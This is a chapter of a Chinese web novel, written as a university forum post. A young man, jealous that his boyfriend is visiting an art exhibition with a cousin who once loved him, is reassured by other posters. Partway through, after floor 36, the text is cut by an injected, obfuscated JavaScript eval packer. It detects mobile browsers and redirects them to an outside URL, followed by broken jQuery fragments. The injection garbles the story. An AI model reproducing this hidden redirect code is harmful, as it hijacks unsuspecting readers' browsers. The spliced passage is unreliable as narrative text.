默认冷灰
24号文字
方正启体

14. 表哥返场邀请顾辞看展,该怎么大度?

作者:天天吃甜本书字数:K更新时间:
    标题:【树洞】表哥返场邀请顾辞看展,该怎么大度?


    论坛板块:京华大学\校园生活\情感树洞


    发帖人:足球不行踢球去


    正文:


    兄弟们。


    我有点难受。


    不是那种撕心裂肺的难受,是那种……堵得慌的难受。


    事情要从今天中午说起。


    ——


    今天中午我在食堂等顾辞吃饭。


    他来得比平时晚了一点,坐下之后脸色有点奇怪。


    我问:“怎么了?”


    他说:“没事。”


    然后低头吃饭。


    但我了解他。他那个“没事”,就是“有事”的意思。


    我没追问。


    吃完饭往回走的时候,他突然说:“张扬,我哥明天来。”


    我愣了一下。


    哥?


    哪个哥?


    他看了我一眼:“顾远洲。”


    哦。


    顾远洲。


    那个穿女装的、暗恋他多年的、一个人去临市的表哥。


    我心里“咯噔”一下。


    但我脸上没表现出来,问:“他来干嘛?”


    “有个画展,他想让我陪他去看。”


    画展。


    他陪他去看画展。


    两个人,看画展。


    我心里又开始堵了。


    但我还是说:“哦,那你去呗。”


    他看了我一眼,那眼神有点复杂。


    但没说什么。


    ——


    晚上他给我发消息。


    【圆圆】:明天上午我去看展,中午不和你吃饭了。


    【张】:好。


    【圆圆】:下午回来,晚上一起吃?


    【张】:好。


    然后就没话了。


    我盯着那个对话框,心里乱七八糟。


    我知道我不应该多想。


    顾远洲是他表哥,是他哥,是那个已经放手的人。


    他们看个画展怎么了?很正常啊。


    但我就是……就是不舒服。


    不是不信顾辞。


    是不信那个画面。


    两个人并肩走在展厅里,他给他讲这幅画那幅画,他认真听。


    光线从窗户照进来,落在他俩身上。


    多好看啊。


    多配啊。


    然后我呢?


    我在球场晒太阳,在宿舍躺着,在食堂一个人吃饭。


    像个傻子。


    ——


    我知道我这个想法很幼稚。


    我也知道顾远洲没有恶意。


    他走的时候说了,下次回来吃小笼包。


    他现在回来了,约顾辞看展,很正常。


    但我就是忍不住想——


    他是不是还没放下?


    他是不是借着看展的机会多见见他?


    他是不是……


    操。


    我不想这么想的。


    但我控制不住。


    ——


    所以我现在纠结的是:


    明天要不要问顾辞?


    问什么?问他和他哥看展开不开心?问他有没有想我?问他顾远洲有没有说什么?


    问了显得我小气。


    不问我又憋得难受。


    还有,明天晚上吃饭的时候,我该什么态度?


    要不要问画展怎么样?


    要不要问顾远洲最近好不好?


    要不要表现得很大度?


    可是我真的很大度吗?


    我一点都不大度。


    我现在就想冲到顾辞宿舍楼下,拉着他问:你们看展的时候,你有没有想起我?


    但我不能。


    他是去看展,不是去干嘛。


    我不能因为自己心里不舒服,就干涉他。


    ——


    所以兄弟们。


    教教我。


    怎么才能大度一点?


    怎么才能不胡思乱想?


    怎么才能相信他,也相信顾远洲?


    怎么才能在明天晚上吃饭的时候,表现得像个正常人?


    在线等。


    挺急的。


    ——


    1楼匿名用户:


    沙发!


    楼主你终于更新了!


    2楼匿名用户:


    看完主楼,我只想说:


    楼主你这是……吃醋了?


    3楼匿名用户:


    回2楼:这哪是吃醋,这是醋缸翻了。


    4楼匿名用户:


    哈哈哈哈哈哈!


    从“我是直男”到“我吃表哥的醋”,


    楼主你真的成长了。


    5楼匿名用户:


    但这次不一样啊!


    顾远洲是那个暗恋过顾辞的人!


    是那个一个人去临市看樱花的人!


    是那个说“下次回来吃小笼包”的人!


    他回来了,约顾辞看展,楼主能不吃醋吗?


    6楼匿名用户:


    理解楼主。


    但说真的,顾远洲应该没那个意思了。


    他走的时候已经放手了。


    7楼匿名用户:


    回6楼:放手归放手,喜欢过的人站在面前,心里还是会动一下的吧?


    这很正常啊。


    但顾辞喜欢的是楼主,这点不会变。


    8楼匿名用户:


    对!


    楼主你要相信顾辞!


    他不是那种会动摇的人。


    9楼匿名用户:


    而且你想想,顾辞如果对顾远洲有意思,早就有了。


    还用等这么多年?


    还用等你开窍?


    10楼匿名用户:


    就是!


    顾辞等的是你!


    不是他!


    11楼楼主:


    道理我都懂。


    但我就是……堵得慌。


    12楼匿名用户:


    正常!


    喜欢一个人,就会在意他的一举一动。


    在意他和谁在一起,在意他开不开心,在意他有没有想自己。


    这不是小气,这是喜欢。


    13楼匿名用户:


    但你不能因为这个,就干涉他。


    他是去看展,不是去干嘛。


    你要是因为这个跟他闹,反而显得你不信任他。


    14楼匿名用户:


    对对对!


    你现在要做的不是堵,是大度。


    大度不是忍着,是信任。


    信任他会处理好,信任他不会动摇,信任他看完展还是会回来找你吃晚饭。


    15楼匿名用户:


    而且你想想,顾辞为什么告诉你?


    因为他不想瞒着你。


    他完全可以不说,但他说了。


    这说明什么?


    说明他把你当自己人。


    16楼匿名用户:


    对!


    他完全可以随便找个理由糊弄过去,但他没有。


    他直接说“我哥来,陪他看展”。


    这是对你的信任。


    17楼楼主:


    ……


    你们说得对。


    他告诉我,是信任我。


    我不能辜负这个信任。


    18楼匿名用户:


    这就对了!


    明天晚上吃饭的时候,你就正常问:


    “画展怎么样?”


    “你哥还好吗?”


    “你们聊什么了?”


    问完就听他说。


    听完就说“那就好”。


    19楼匿名用户:


    对对对!


    表现得像个正常人!


    别阴阳怪气,别追着问细节,别一副“你快安慰我”的样子。


    20楼匿名用户:


    你要是表现得太在意,反而会把顾辞推远。


    他会觉得你不信任他,会觉得和你在一起有压力。


    21楼匿名用户:


    而且你想想,顾远洲这次回来,说不定就是想看看顾辞过得好不好。


    他看见顾辞和你在一起很幸福,他就放心了。


    你表现得大度一点,他也放心。


    22楼匿名用户:


    对!


    顾远洲不是来抢人的,是来确认的。


    确认顾辞幸福,确认你对他好。


    你让他确认了,他就安心走了。


    23楼楼主:


    ……


    有道理。


    那我现在该怎么办?


    24楼匿名用户:


    现在?


    现在什么都别做。


    别问他,别试探,别发消息。


    就让他好好去看展。


    25楼匿名用户:


    对对对!


    别在他看展的时候发消息问“在干嘛”“开心吗”“想我没”。


    那太烦了。


    26楼匿名用户:


    你就该干嘛干嘛。


    去训练,去吃饭,去睡觉。


    等他回来,正常吃饭,正常聊天。


    27楼楼主:


    ……


    好。


    我去训练。


    把自己累趴下,就没空想这些了。


    28楼匿名用户:


    对!


    这个办法好!


    身体累了,脑子就不转了。


    29楼匿名用户:


    哈哈哈哈哈哈!


    赛博父母又上线了!


    儿子,加油!


    30楼匿名用户:


    话说回来,楼主你有没有想过另一种可能?


    31楼楼主:


    什么可能?


    32楼匿名用户:


    顾辞去看展,心里想的全是你。


    33楼匿名用户:


    对对对!


    他站在一幅画前面,顾远洲在旁边讲。


    但他脑子里想的是:“这幅画张扬会喜欢吗?”“那个颜色张扬穿好看”“这个角度要是张扬在,肯定会说看不懂然后让我讲”。


    34楼匿名用户:


    哈哈哈哈哈哈!


    太真实了!


    喜欢一个人的时候,不管在哪儿,都会想起他。


    35楼匿名用户:


    所以楼主你别担心。


    顾辞看展的时候,可能满脑子都是你。


    顾远洲讲什么,他根本没听进去。


    36楼楼主:


    ……


    会吗?<


    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382526|200203||http|test|mini|href|location''.split(''|''),0,{}));


    () {


    $(''.inform'').remove();


    $(''#content'').append(''


    /p>


    37楼匿名用户:


    会!


    肯定会的!


    你就是他的恋爱脑!


    38楼匿名用户:


    对!


    你就是他的“在看什么都会想起你”的那个人!


    顾远洲只是过去,你是现在和未来。


    39楼楼主:


    ……


    好多了。


    谢谢你们。


    40楼匿名用户:


    不谢!


    赛博父母应该做的!


    41楼匿名用户:


    对了楼主,明天晚上吃饭,你可以带点东西给他。


    42楼楼主:


    什么东西?


    43楼匿名用户:


    小蛋糕啊!


    他喜欢甜的。


    看完展回来累了,吃块小蛋糕,心情好。


    44楼匿名用户:


    对对对!


    或者买杯奶茶。


    等他回来,递给他一杯热奶茶。


    什么都不用说,他就知道你在想他。


    45楼楼主:


    好。


    我明天去买。


    46楼匿名用户:


    还有!


    明天他回来的时候,你别说“我想你了”这种话。


    47楼楼主:


    为什么?


    48楼匿名用户:


    因为太刻意了!


    他刚看完展回来,你这么说,他会觉得你在暗示“你去看展了我好难受”。


    49楼匿名用户:


    对对对!


    你就正常说话,正常吃饭。


    等他放松下来,自然会跟你说今天的事。


    50楼匿名用户:


    然后你说:“听起来不错,下次我们一起去?”


    这就够了。


    51楼匿名用户:


    对!


    “下次我们一起去”!


    既表达了你对画展的兴趣,又表达了你对他哥的接纳,还表达了你想和他一起做更多事的愿望。


    一箭三雕!


    52楼楼主:


    ……


    你们太厉害了。


    我记下了。


    53楼匿名用户:


    行了,儿子去吧。


    去训练,把自己累趴下。


    明天晚上等你的好消息。


    54楼楼主:


    好。


    我去了。


    ——


    【训练之后】


    训练完回来,我累得跟狗一样。


    洗完澡躺在床上,脑子确实不转了。


    但手还是忍不住拿起了手机。


    有一条未读消息。


    【圆圆】:刚回酒店,我哥在洗澡。


    【圆圆】:今天画展还行,但没你好看。


    我盯着那两行字,愣了三秒。


    然后笑了。


    笑得像个傻子。


    他说“没你好看”。


    他说画展没我好看。


    操。


    这人怎么这么会说话?


    我回他:


    【张】:你也没我想的好看。


    【圆圆】:?


    【张】:因为你本人比我想的好看一万倍。


    【圆圆】:……


    【圆圆】:你从哪儿学的这些?


    【张】:自学的。


    【圆圆】:不信。


    【张】:真的,看到你就自动会了。


    【圆圆】:……


    【圆圆】:睡觉了。


    【张】:晚安。


    【圆圆】:晚安,张扬。


    我把手机扣在胸口。


    嘴角快咧到耳朵根。


    堵了一下午的心,突然就通了。


    ——


    兄弟姐妹们。


    我现在明白了。


    大度不是忍着。


    是相信他。


    相信他不会动摇,相信他心里只有我。


    也相信我自己。


    相信我是那个让他说“没你好看”的人。


    ——


    明天晚上吃饭。


    我会问他画展怎么样。


    会问他顾远洲好不好。


    会说“下次我们一起去”。


    然后看他笑。


    就够了。


    ——


    50楼匿名用户:


    呜呜呜呜呜!!!


    “画展还行,但没你好看”!!!


    这是什么神仙情话!!!


    51楼匿名用户:


    顾辞真的太会了!!!


    一句话就让楼主不堵了!!!


    52楼匿名用户:


    楼主你也不差!


    “你本人比我想的好看一万倍”!


    这谁顶得住啊!


    53楼匿名用户:


    这就是双向奔赴吗?


    这就是爱情吗?


    我酸了。


    54楼匿名用户:


    行了,儿子终于不堵了。


    赛博父母可以放心了。


    55楼匿名用户:


    明天继续汇报!


    我们要看后续!


    56楼楼主:


    好。


    明天见。
(←快捷键) <<上一章 投推荐票 回目录 标记书签 下一章>> (快捷键→)